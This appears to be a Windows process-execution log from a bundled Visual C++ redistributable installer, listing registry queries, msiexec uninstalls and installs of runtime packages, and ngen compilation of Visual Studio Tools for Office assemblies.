findstr /i /v {5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2008 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2010 x64 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\findstr.exe

findstr /i /v {1D8E6291-B0D5-35EC-8441-6616F567A0F7}

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2010 x64 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2012 x64 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {37B8F9C7-03FB-3253-8781-2517C99D7C00}

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2012 x64 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2013 x64 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {010792BA-551A-3AC0-A7EF-0FAB4156C382}

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2013 x64 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {53CF6934-A98D-3D84-9146-FC4EDF3D5641}

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2022 x64 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {59CED48F-EBFE-480C-8A38-FC079C2BEC0F}

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2022 x64 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {B8B3BB4A-A10D-4F51-91B7-A64FFAC31EA7}

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 14 x64 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 14 x64 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015 x64 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015 x64 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2017 x64 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2017 x64 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2019 x64 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2019 x64 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i "HKEY_LOCAL_MACHINE" "C:\Users\Admin\AppData\Local\Temp\msi.txt"

C:\Windows\system32\msiexec.exe

MsiExec.exe /X{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4} /passive /norestart

\??\c:\Windows\System32\MsiExec.exe

c:\Windows\System32\MsiExec.exe -Embedding 08A46ABEE1929C1DE0115977335C24A0

C:\Windows\system32\reg.exe

reg delete hklm\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4} /f

C:\Windows\system32\msiexec.exe

MsiExec.exe /X{1D8E6291-B0D5-35EC-8441-6616F567A0F7} /passive /norestart

\??\c:\Windows\System32\MsiExec.exe

c:\Windows\System32\MsiExec.exe -Embedding 8E8A6A70106227EE824F9BB9F6F18C23

C:\Windows\system32\reg.exe

reg delete hklm\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7} /f

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2005\x64\vcredist.msi" /qb

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 8463F09A1F278784D58234DDA61E389D

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2008\x64\vc_red.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2010\x64\vc_red.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2012\x64\vc_runtimeMinimum_x64.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2012\x64\vc_runtimeAdditional_x64.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2013\x64\vc_runtimeMinimum_x64.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2013\x64\vc_runtimeAdditional_x64.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2022\x64\vc_runtimeMinimum_x64.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2022\x64\vc_runtimeAdditional_x64.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\vstor\vstor40_x64.msi" /qb

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 73FA97C846EF6F98E6477EB577799233

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 3740AAE4DD2A7F128737B378ED057BDC

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 0F8934F6A7679C521885486E698A5740 M Global\MSI0000

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 2E70575927AA93B046D9D75CB575B8EC E Global\MSI0000

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6FB4398B0F816799BD2BCF1D643A59B5 E Global\MSI0000

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Contract.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Contract.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Hosting.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Hosting.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.ServerDocument.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.ServerDocument.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Runtime.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Runtime.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Contract.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Contract.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.Office.Tools.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.Office.Tools.v9.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.ContainerControl.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.ContainerControl.v10.0, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Runtime, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Runtime, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

